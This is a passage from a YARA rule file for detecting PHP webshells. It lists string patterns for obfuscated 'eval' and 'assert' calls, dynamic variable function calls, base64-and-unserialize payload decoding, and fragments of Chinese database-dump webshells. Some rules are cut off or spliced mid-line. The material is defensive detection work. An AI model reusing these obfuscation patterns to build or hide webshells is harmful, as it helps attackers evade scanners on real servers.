	$opbs27 = "'c'.'h'.'r'" wide ascii
	$opbs28 = "\"ht\".\"tp\".\":/\"" wide ascii
	$opbs29 = "\"ht\".\"tp\".\"s:" wide ascii
	$opbs31 = "'ev'.'al'" nocase wide ascii
	$opbs32 = "eval/*" nocase wide ascii
	$opbs33 = "eval(/*" nocase wide ascii
	$opbs34 = "eval(\"/*" nocase wide ascii
	$opbs36 = "assert/*" nocase wide ascii
	$opbs37 = "assert(/*" nocase wide ascii
	$opbs38 = "assert(\"/*" nocase wide ascii
	$opbs40 = "'ass'.'ert'" nocase wide ascii
	$opbs41 = "${'_'.$_}['_'](${'_'.$_}['__'])" wide ascii
	$opbs44 = "'s'.'s'.'e'.'r'.'t'" nocase wide ascii
	$opbs45 = "'P'.'O'.'S'.'T'" wide ascii
	$opbs46 = "'G'.'E'.'T'" wide ascii
	$opbs47 = "'R'.'E'.'Q'.'U'" wide ascii
	$opbs48 = "se'.(32*2)" nocase
	$opbs49 = "'s'.'t'.'r_'" nocase
	$opbs50 = "'ro'.'t13'" nocase
	$opbs51 = "c'.'od'.'e" nocase
	$opbs53 = "e'. 128/2 .'_' .'d"
	$opbs54 = " 2KB and ( $php_semi2 in (filesize-1000 .. filesize) ) )
}
rule Php_Webshell_webshell_php_dynamic
{
strings:
	$pd_fp1 = "whoops_add_stack_frame" wide ascii
	$pd_fp2 = "new $ec($code, $mode, $options, $userinfo);" wide ascii
	$php_short = " 20 and filesize < 200 and ( ( ( $php_short in (0..100) or $php_short in (filesize-1000..filesize) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $dynamic* ) ) and not any of ( $pd_fp* )
}
rule Php_Webshell_CN_Honker_Webshell_Tuoku_script_mysql
{
strings:
	$s1 = "txtpassword.Attributes.Add(\"onkeydown\", \"SubmitKeyClick('btnLogin');\");" fullword ascii
	$s2 = "connString = string.Format(\"Host = {0}; UserName = {1}; Password = {2}; Databas" ascii
condition:
	filesize < 202KB and all of them
}
rule Php_Webshell_PHP_Webshell_1_Feb17
{
strings:
	$h1 = "@phpversion(),\"\\x" ascii
	$s1 = "$i=Array(\"pv\"=>@phpversion(),\"sv\"" ascii
	$s3 = "$data = @unserialize(sh_decrypt(@base64_decode($data),$data_key));" ascii
condition:
	uint32(0) == 0x68703f3c and ( $h1 at 0 and 1 of them ) or 2 of them
}